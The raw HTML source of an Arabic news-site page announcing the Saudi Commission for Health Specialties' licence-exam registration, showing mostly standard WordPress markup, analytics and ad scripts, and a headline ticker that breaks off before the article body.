
<!DOCTYPE html>
<!--[if IE 8]> <html class="ie ie8" dir="rtl" lang="ar" prefix="og: http://ogp.me/ns#"> <![endif]-->
<!--[if IE 9]> <html class="ie ie9" dir="rtl" lang="ar" prefix="og: http://ogp.me/ns#"> <![endif]-->
<!--[if gt IE 9]><!--> <html dir="rtl" lang="ar" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
<meta charset="UTF-8" />
<title>&quot;التخصصات الصحية&quot; تعلن مواعيد اختبارات رخصة الممارسة المهنية - صحيفة أنحاء الإلكترونية</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link rel="pingback" href="http://www.an7a.com/xmlrpc.php" />
<link rel="shortcut icon" href="http://www.an7a.com/wp-content/uploads/2012/09/logo_an7a_1.png" />
<link rel="apple-touch-icon-precomposed" href="http://www.an7a.com/wp-content/uploads/2012/09/logo_an7a_1.png" />
<script type="text/javascript">
		var ajaxurl = 'http://www.an7a.com/wp-admin/admin-ajax.php';
		</script>

<meta name="keywords" content="الهيئة السعودية للتخصصات الصحية , مواعيد , اختبارات , رخصة الممارسة المهنية" />
<link rel="canonical" href="http://www.an7a.com/314933/" />
<link rel="publisher" href="https://plus.google.com/100917030281374462488/about" />
<meta property="og:locale" content="ar_AR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="&quot;التخصصات الصحية&quot; تعلن مواعيد اختبارات رخصة الممارسة المهنية - صحيفة أنحاء الإلكترونية" />
<meta property="og:description" content="الرياض &#8211; واس :- أعلنت الهيئة السعودية للتخصصات الصحية فتح باب التقديم لاختبارات رخصة الممارسة المهنية للفترات الاختبارية" />
<meta property="og:url" content="http://www.an7a.com/314933/" />
<meta property="og:site_name" content="صحيفة أنحاء الإلكترونية" />
<meta property="article:publisher" content="https://www.facebook.com/an7acom" />
<meta property="article:tag" content="اختبارات" />
<meta property="article:tag" content="الهيئة السعودية للتخصصات الصحية" />
<meta property="article:tag" content="رخصة الممارسة المهنية" />
<meta property="article:tag" content="مواعيد" />
<meta property="article:section" content="أنحاء الوطن" />
<meta property="article:published_time" content="2017-10-12T13:33:30+00:00" />
<meta property="og:image" content="http://www.an7a.com/wp-content/uploads/2017/10/DL65ApBX0AAGZT3.jpg" />
<meta property="og:image:width" content="839" />
<meta property="og:image:height" content="373" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="الرياض &#8211; واس :- أعلنت الهيئة السعودية للتخصصات الصحية فتح باب التقديم لاختبارات رخصة الممارسة المهنية للفترات الاختبارية" />
<meta name="twitter:title" content="&quot;التخصصات الصحية&quot; تعلن مواعيد اختبارات رخصة الممارسة المهنية - صحيفة أنحاء الإلكترونية" />
<meta name="twitter:site" content="@an7a_com" />
<meta name="twitter:image" content="http://www.an7a.com/wp-content/uploads/2017/10/DL65ApBX0AAGZT3.jpg" />
<meta name="twitter:creator" content="@an7a_com" />

<link rel='dns-prefetch' href='//p.jwpcdn.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="صحيفة أنحاء الإلكترونية &raquo; الخلاصة" href="http://www.an7a.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="صحيفة أنحاء الإلكترونية &raquo; خلاصة التعليقات" href="http://www.an7a.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="صحيفة أنحاء الإلكترونية &raquo; &#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية خلاصة التعليقات" href="http://www.an7a.com/314933/feed/" />
<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.an7a.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.2"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css' href='http://www.an7a.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.8' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-rtl-css' href='http://www.an7a.com/wp-content/plugins/contact-form-7/includes/css/styles-rtl.css?ver=4.8' type='text/css' media='all' />
<link rel='stylesheet' id='posts-from-category-widget-stylesheet-css' href='http://www.an7a.com/wp-content/plugins/posts-in-category-widget/style.css?ver=1.2.0' type='text/css' media='all' />
<link rel='stylesheet' id='rs-plugin-settings-css' href='http://www.an7a.com/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&#038;ver=4.8.2' type='text/css' media='all' />
<style id='rs-plugin-settings-inline-css' type='text/css'>
.tp-caption a{color:#ff7302;text-shadow:none;-webkit-transition:all 0.2s ease-out;-moz-transition:all 0.2s ease-out;-o-transition:all 0.2s ease-out;-ms-transition:all 0.2s ease-out}.tp-caption a:hover{color:#ffa902}
</style>
<link rel='stylesheet' id='wpt-twitter-feed-css' href='http://www.an7a.com/wp-content/plugins/wp-to-twitter/css/twitter-feed.css?ver=4.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-core-css' href='http://www.an7a.com/wp-content/themes/smart-mag/css/rtl.css?ver=2.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-child-core-css' href='http://www.an7a.com/wp-content/themes/smart-mag-child/style.css?ver=2.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-responsive-css' href='http://www.an7a.com/wp-content/themes/smart-mag/css/rtl-responsive.css?ver=2.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-child-responsive-css' href='http://www.an7a.com/wp-content/themes/smart-mag-child/css/responsive.css?ver=2.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-fonts-css' href='http://fonts.googleapis.com/css?family=Open+Sans:400,400Italic,600,700|Roboto+Slab|Merriweather:300italic&#038;subset' type='text/css' media='all' />
<link rel='stylesheet' id='smartmag-font-awesome-css' href='http://www.an7a.com/wp-content/themes/smart-mag/css/fontawesome/css/font-awesome.min.css?ver=2.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='popular-widget-css' href='http://www.an7a.com/wp-content/plugins/popular-widget/_css/pop-widget.css?ver=1.7.0' type='text/css' media='all' />
<link rel='stylesheet' id='wordpress-popular-posts-css' href='http://www.an7a.com/wp-content/plugins/wordpress-popular-posts/style/wpp.css?ver=3.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='custom-css-css' href='http://www.an7a.com/?anchor_obj=6220&#038;__custom_css=1&#038;ver=4.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='mediaelementjs-styles-css' href='http://www.an7a.com/wp-content/plugins/media-element-html5-video-and-audio-player/mediaelement/mediaelementplayer.css?ver=4.8.2' type='text/css' media='all' />
<script type='text/javascript' src='http://www.an7a.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://p.jwpcdn.com/6/12/jwplayer.js?ver=4.8.2'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&#038;ver=4.8.2'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&#038;ver=4.8.2'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/plugins/wp-retina-2x/js/picturefill.min.js?ver=3.0.2'></script>
<script type='text/javascript' src='http://www.an7a.com/wp-content/plugins/media-element-html5-video-and-audio-player/mediaelement/mediaelement-and-player.min.js?ver=2.1.3'></script>
<link rel='https://api.w.org/' href='http://www.an7a.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.an7a.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.an7a.com/wp-includes/wlwmanifest.xml" />
<meta name="generator" content="WordPress 4.8.2" />
<link rel='shortlink' href='http://wp.me/p2F0Lr-1jVz' />
<link rel="alternate" type="application/json+oembed" href="http://www.an7a.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.an7a.com%2F314933%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.an7a.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.an7a.com%2F314933%2F&#038;format=xml" />

<script type="text/javascript">
_atrk_opts = { atrk_acct:"gYuAi1a8Dy00aX", domain:"an7a.com",dynamic: true};
(function() { var as = document.createElement('script'); as.type = 'text/javascript'; as.async = true; as.src = "https://d31qbv1cthcecs.cloudfront.net/atrk.js"; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(as, s); })();
</script>
<noscript><img src="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=gYuAi1a8Dy00aX" style="display:none" height="1" width="1" alt="" /></noscript>

<meta property="fb:pages" content="140877595973199" />
<meta property="ia:markup_url" content="http://www.an7a.com/314933/?ia_markup=1" />
<script type="text/javascript">jwplayer.defaults = { "ph": 2 };</script>
<script type="text/javascript">
            if (typeof(jwp6AddLoadEvent) == 'undefined') {
                function jwp6AddLoadEvent(func) {
                    var oldonload = window.onload;
                    if (typeof window.onload != 'function') {
                        window.onload = func;
                    } else {
                        window.onload = function() {
                            if (oldonload) {
                                oldonload();
                            }
                            func();
                        }
                    }
                }
            }
            </script>

<script type="text/javascript">

					var sampling_active = 0;
					var sampling_rate   = 100;
					var do_request = false;

					if ( !sampling_active ) {
						do_request = true;
					} else {
						var num = Math.floor(Math.random() * sampling_rate) + 1;
						do_request = ( 1 === num );
					}

					if ( do_request ) {

						/* Create XMLHttpRequest object and set variables */
						var xhr = ( window.XMLHttpRequest )
						  ? new XMLHttpRequest()
						  : new ActiveXObject( "Microsoft.XMLHTTP" ),
						url = 'http://www.an7a.com/wp-admin/admin-ajax.php',
						params = 'action=update_views_ajax&token=fcf27d705a&wpp_id=314933';
						/* Set request method and target URL */
						xhr.open( "POST", url, true );
						/* Set request header */
						xhr.setRequestHeader( "Content-type", "application/x-www-form-urlencoded" );
						/* Hook into onreadystatechange */
						xhr.onreadystatechange = function() {
							if ( 4 === xhr.readyState && 200 === xhr.status ) {
								if ( window.console && window.console.log ) {
									window.console.log( xhr.responseText );
								}
							}
						};
						/* Send request */
						xhr.send( params );

					}

				</script>


<script type="text/javascript">

					var sampling_active = 0;
					var sampling_rate   = 100;
					var do_request = false;

					if ( !sampling_active ) {
						do_request = true;
					} else {
						var num = Math.floor(Math.random() * sampling_rate) + 1;
						do_request = ( 1 === num );
					}

					if ( do_request ) {

						/* Create XMLHttpRequest object and set variables */
						var xhr = ( window.XMLHttpRequest )
						  ? new XMLHttpRequest()
						  : new ActiveXObject( "Microsoft.XMLHTTP" ),
						url = 'http://www.an7a.com/wp-admin/admin-ajax.php',
						params = 'action=update_views_ajax&token=fcf27d705a&wpp_id=314933';
						/* Set request method and target URL */
						xhr.open( "POST", url, true );
						/* Set request header */
						xhr.setRequestHeader( "Content-type", "application/x-www-form-urlencoded" );
						/* Hook into onreadystatechange */
						xhr.onreadystatechange = function() {
							if ( 4 === xhr.readyState && 200 === xhr.status ) {
								if ( window.console && window.console.log ) {
									window.console.log( xhr.responseText );
								}
							}
						};
						/* Send request */
						xhr.send( params );

					}

				</script>

<link rel="amphtml" href="http://www.an7a.com/314933/amp/" /><meta property="fb:pages" content="140877595973199" />
<!--[if lt IE 9]>
<script src="http://www.an7a.com/wp-content/themes/smart-mag/js/html5.js" type="text/javascript"></script>
<![endif]-->

<script src="https://apis.google.com/js/platform.js" async defer>
  {lang: 'ar'}
</script>
</head>
<body class="rtl post-template-default single single-post postid-314933 single-format-standard page-builder right-sidebar full has-nav-dark">

<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.0";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<div class="main-wrap">
<div class="top-bar">
<div class="wrap">
<section class="top-bar-content">
<div class="top-bar-date">12 أكتوبر 2017 مـ / موافق 22 محرم, 1439 هـ</div>
<div class="textwidget"><ul class="social-icons">
<li><a href="mailto:" class="icon fa fa-envelope" title="Mail"><span class="visuallyhidden">Mail</span></a></li>
<li><a href="/?feed=rss2" class="icon fa fa-rss" title="RSS"><span class="visuallyhidden">RSS</span></a></li>
<li><a href="http://www.youtube.com/an7acom" class="icon fa fa-play" title="YouTube"><span class="visuallyhidden">YouTube</span></a></li>
<li><a href="https://plus.google.com/100917030281374462488" class="icon fa fa-google-plus" title="Google+"><span class="visuallyhidden">Google+</span></a></li>
<li><a href="http://www.twitter.com/an7a_com" class="icon fa fa-twitter" title="Twitter"><span class="visuallyhidden">Twitter</span></a></li>
<li><a href="http://www.facebook.com/an7acom" class="icon fa fa-facebook" title="Facebook"><span class="visuallyhidden">Facebook</span></a></li>
</ul></div>
</section>
</div>
</div>
<div id="main-head" class="main-head">
<div class="wrap">
<header>
<div class="title">
<a href="http://www.an7a.com/" title="صحيفة أنحاء الإلكترونية" rel="home">
<img class="logo-image" alt="صحيفة أنحاء الإلكترونية" data-at2x="http://www.an7a.com/wp-content/uploads/2015/02/logo@2x.png" srcset="http://www.an7a.com/wp-content/uploads/2015/02/logo.png, http://www.an7a.com/wp-content/uploads/2015/02/logo@2x.png 2x" />
</a>
</div>
<div class="right">
<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/ddm/adj/N9253.3047664AN7A.COM/B20224456.203649126;sz=728x90;ord=[timestamp];dc_lat=;dc_rdid=;tag_for_child_directed_treatment=?">
</SCRIPT>
<NOSCRIPT>
<A HREF="https://ad.doubleclick.net/ddm/jump/N9253.3047664AN7A.COM/B20224456.203649126;sz=728x90;ord=[timestamp]?">
<IMG SRC="https://ad.doubleclick.net/ddm/ad/N9253.3047664AN7A.COM/B20224456.203649126;sz=728x90;ord=[timestamp];dc_lat=;dc_rdid=;tag_for_child_directed_treatment=?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
</NOSCRIPT>
</div>
</header>
<nav class="navigation cf">
<div class="mobile" data-type="classic" data-search="1">
<a href="#" class="selected">
<span class="text">التنقل</span><span class="current"></span> <i class="hamburger fa fa-bars"></i>
</a>
</div>
<div class="menu-main-container"><ul id="menu-main" class="menu"><li id="menu-item-164224" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-164224"><a href="http://www.an7a.com/">الرئيسية</a></li>
<li id="menu-item-69142" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-cat-6220 menu-item-69142"><a href="http://www.an7a.com/category/an7a-national/">أنحاء الوطن</a>
<ul class="sub-menu">
<li id="menu-item-69141" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-8617 menu-item-69141"><a href="http://www.an7a.com/category/issue/">ملفات</a></li>
</ul>
</li>
<li id="menu-item-69149" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6223 menu-item-69149"><a href="http://www.an7a.com/category/an7a-world/">أنحاء العالم</a></li>
<li id="menu-item-69153" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-cat-6227 menu-item-69153"><a href="http://www.an7a.com/category/an7a-cultural/">ثقافة وفنون</a>
<ul class="sub-menu">
<li id="menu-item-94094" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6242 menu-item-94094"><a href="http://www.an7a.com/category/photos/">العالم صورة</a></li>
<li id="menu-item-69154" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6222 menu-item-69154"><a href="http://www.an7a.com/category/social-media/">شبكات اجتماعية</a></li>
<li id="menu-item-69157" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6238 menu-item-69157"><a href="http://www.an7a.com/category/profile/">بروفايل</a></li>
<li id="menu-item-69326" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6236 menu-item-69326"><a href="http://www.an7a.com/category/tube-stars/">نجوم تيوب</a></li>
<li id="menu-item-94095" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6240 menu-item-94095"><a href="http://www.an7a.com/category/art-clip/">الكاريكاتير</a></li>
</ul>
</li>
<li id="menu-item-69159" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-cat-6225 menu-item-69159"><a href="http://www.an7a.com/category/economic/">اقتصاد</a>
<ul class="sub-menu">
<li id="menu-item-69160" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6218 menu-item-69160"><a href="http://www.an7a.com/category/tech/">التكنولوجيا</a></li>
<li id="menu-item-69158" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-8626 menu-item-69158"><a href="http://www.an7a.com/category/business/">الشركات</a></li>
</ul>
</li>
<li id="menu-item-69164" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6219 menu-item-69164"><a href="http://www.an7a.com/category/sports/">رياضة</a></li>
<li id="menu-item-69156" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6229 menu-item-69156"><a href="http://www.an7a.com/category/students/">مبتعثون</a></li>
<li id="menu-item-69167" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-cat-8630 menu-item-69167"><a href="http://www.an7a.com/category/community/">مجتمع</a>
<ul class="sub-menu">
<li id="menu-item-69312" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6239 menu-item-69312"><a href="http://www.an7a.com/category/here-and-there/">هنا و هناك</a></li>
<li id="menu-item-69166" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-8631 menu-item-69166"><a href="http://www.an7a.com/category/cases/">قضايا</a></li>
</ul>
</li>
<li id="menu-item-69168" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-cat-8633 menu-item-69168"><a href="http://www.an7a.com/category/articles/">الرأي</a>
<ul class="sub-menu">
<li id="menu-item-69170" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6241 menu-item-69170"><a href="http://www.an7a.com/category/an7a-writers/">كتاب أنحاء</a></li>
<li id="menu-item-69537" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6221 menu-item-69537"><a href="http://www.an7a.com/category/press-authors/">مقالات الصحف</a></li>
</ul>
</li>
<li id="menu-item-69327" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-cat-8637 menu-item-69327"><a href="http://www.an7a.com/category/interviews/">حوارات</a>
<ul class="sub-menu">
<li id="menu-item-69329" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-6233 menu-item-69329"><a href="http://www.an7a.com/category/twitter-interviwes/">حوار مع مغرد</a></li>
<li id="menu-item-69328" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-cat-8636 menu-item-69328"><a href="http://www.an7a.com/category/interview/">مقابلة</a></li>
</ul>
</li>
</ul></div> </nav>
</div>
</div>
<div class="wrap">
 <div class="news-ticker">
<div class="flexslider news-carousel">
<ul class="slides">
<li>
<div class="news-image">
<a href="http://www.an7a.com/314942/" title="&#8220;التأمينات&#8221;: 1500 ريال الحد الأدنى للاشتراك في المعاشات و400 ريال للأخطار المهنية" class="image-link">
<img width="140" height="90" src="http://www.an7a.com/wp-content/uploads/2017/10/485c352c-4f7d-47aa-b095-428e16282476-140x90.jpg" class="attachment-slider-thumbnail size-slider-thumbnail wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/10/485c352c-4f7d-47aa-b095-428e16282476-140x90.jpg 140w, http://www.an7a.com/wp-content/uploads/2017/10/485c352c-4f7d-47aa-b095-428e16282476-140x90@2x.jpg 280w" sizes="(max-width: 140px) 100vw, 140px" /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314942/" title="&#8220;التأمينات&#8221;: 1500 ريال الحد الأدنى للاشتراك في المعاشات و400 ريال للأخطار المهنية">“التأمينات”: 1500 ريال الحد الأدنى للاشتراك ف...</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T14:39:25+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
</div>
</li>
<li>
<div class="news-image">
<a href="http://www.an7a.com/314941/" title="&#8220;الداخلية&#8221;: تنفيذ &#8220;حد الحرابة&#8221; في هنديين قتلا بنغلاديشياً في الرياض" class="image-link">
<img width="140" height="79" src="http://www.an7a.com/wp-content/uploads/2014/11/94.jpg" class="attachment-slider-thumbnail size-slider-thumbnail wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2014/11/94.jpg 640w, http://www.an7a.com/wp-content/uploads/2014/11/94-300x168.jpg 300w, http://www.an7a.com/wp-content/uploads/2014/11/94-610x350.jpg 610w" sizes="(max-width: 140px) 100vw, 140px" /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314941/" title="&#8220;الداخلية&#8221;: تنفيذ &#8220;حد الحرابة&#8221; في هنديين قتلا بنغلاديشياً في الرياض">“الداخلية”: تنفيذ “حد الحرابة” في هنديين قتلا...</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T14:28:12+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
</div>
</li>
<li>
<div class="news-image">
<a href="http://www.an7a.com/314939/" title="حرس الحدود يوضح حقيقة حرمان اللائحة البحرية للمرأة من الخروج في رحلة بحرية برفقة أبنائها" class="image-link">
<img width="140" height="90" src="http://www.an7a.com/wp-content/uploads/2017/10/59dea1567ff3c-140x90.jpg" class="attachment-slider-thumbnail size-slider-thumbnail wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/10/59dea1567ff3c-140x90.jpg 140w, http://www.an7a.com/wp-content/uploads/2017/10/59dea1567ff3c-140x90@2x.jpg 280w" sizes="(max-width: 140px) 100vw, 140px" /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314939/" title="حرس الحدود يوضح حقيقة حرمان اللائحة البحرية للمرأة من الخروج في رحلة بحرية برفقة أبنائها">حرس الحدود يوضح حقيقة حرمان اللائحة البحرية ل...</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T14:03:06+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
</div>
</li>
<li>
<div class="news-image">
<a href="http://www.an7a.com/314937/" title="&#8220;التحالف&#8221; يدمر منصة الصواريخ التي أطلقت صاروخ باتجاه مدرسة في جازان" class="image-link">
<img width="140" height="90" src="http://www.an7a.com/wp-content/uploads/2017/10/18dea8aa-3e10-49d5-bc7f-cedbde029bf8-140x90.jpg" class="attachment-slider-thumbnail size-slider-thumbnail wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/10/18dea8aa-3e10-49d5-bc7f-cedbde029bf8-140x90.jpg 140w, http://www.an7a.com/wp-content/uploads/2017/10/18dea8aa-3e10-49d5-bc7f-cedbde029bf8-140x90@2x.jpg 280w" sizes="(max-width: 140px) 100vw, 140px" /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314937/" title="&#8220;التحالف&#8221; يدمر منصة الصواريخ التي أطلقت صاروخ باتجاه مدرسة في جازان">“التحالف” يدمر منصة الصواريخ التي أطلقت صاروخ...</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T13:52:50+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
</div>
</li>
<li>
<div class="news-image">
<a href="http://www.an7a.com/314935/" title="إصابة 4 عمال إثر حريق في حقل برقان النفطي بالكويت" class="image-link">
<img width="140" height="90" src="http://www.an7a.com/wp-content/uploads/2017/10/Untitled-41-140x90.jpg" class="attachment-slider-thumbnail size-slider-thumbnail wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/10/Untitled-41-140x90.jpg 140w, http://www.an7a.com/wp-content/uploads/2017/10/Untitled-41-140x90@2x.jpg 280w" sizes="(max-width: 140px) 100vw, 140px" /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314935/" title="إصابة 4 عمال إثر حريق في حقل برقان النفطي بالكويت">إصابة 4 عمال إثر حريق في حقل برقان النفطي بال...</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T13:40:50+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
</div>
</li>
<li>
<div class="news-image">
<a href="http://www.an7a.com/314933/" title="&#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية" class="image-link">
<img width="140" height="90" src="http://www.an7a.com/wp-content/uploads/2017/10/DL65ApBX0AAGZT3-140x90.jpg" class="attachment-slider-thumbnail size-slider-thumbnail wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2017/10/DL65ApBX0AAGZT3-140x90.jpg 140w, http://www.an7a.com/wp-content/uploads/2017/10/DL65ApBX0AAGZT3-140x90@2x.jpg 280w" sizes="(max-width: 140px) 100vw, 140px" /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314933/" title="&#8220;التخصصات الصحية&#8221; تعلن مواعيد اختبارات رخصة الممارسة المهنية">“التخصصات الصحية” تعلن مواعيد اختبارات رخصة ا...</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T13:33:30+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
</span>
</div>
</li>
<li>
<div class="news-image">
<a href="http://www.an7a.com/314932/" title="&#8220;الداخلية&#8221;: القتل تعزيراً بحق &#8220;فلسطيني وسعودي&#8221;.. أدينا بالمشاركة في تلقي كمية كبيرة من &#8220;الإمفيتامين&#8221;" class="image-link">
<img width="140" height="79" src="http://www.an7a.com/wp-content/uploads/2014/08/2-نسخ1.jpg" class="attachment-slider-thumbnail size-slider-thumbnail wp-post-image" alt="" srcset="http://www.an7a.com/wp-content/uploads/2014/08/2-نسخ1.jpg 640w, http://www.an7a.com/wp-content/uploads/2014/08/2-نسخ1-300x168.jpg 300w, http://www.an7a.com/wp-content/uploads/2014/08/2-نسخ1-610x350.jpg 610w" sizes="(max-width: 140px) 100vw, 140px" /> </a>
</div>
<div class="news-content">
<a class="short-title" href="http://www.an7a.com/314932/" title="&#8220;الداخلية&#8221;: القتل تعزيراً بحق &#8220;فلسطيني وسعودي&#8221;.. أدينا بالمشاركة في تلقي كمية كبيرة من &#8220;الإمفيتامين&#8221;">“الداخلية”: القتل تعزيراً بحق “فلسطيني وسعودي...</a>
<span class="posted-on"><i class="fa fa-clock-o"></i>بتاريخ <span class="dtreviewed">
<time class="value-title" datetime="2017-10-12T13:24:22+03:00" title="2017-10-12" itemprop="datePublished">أكتوبر 12, 2017</time>
</span>
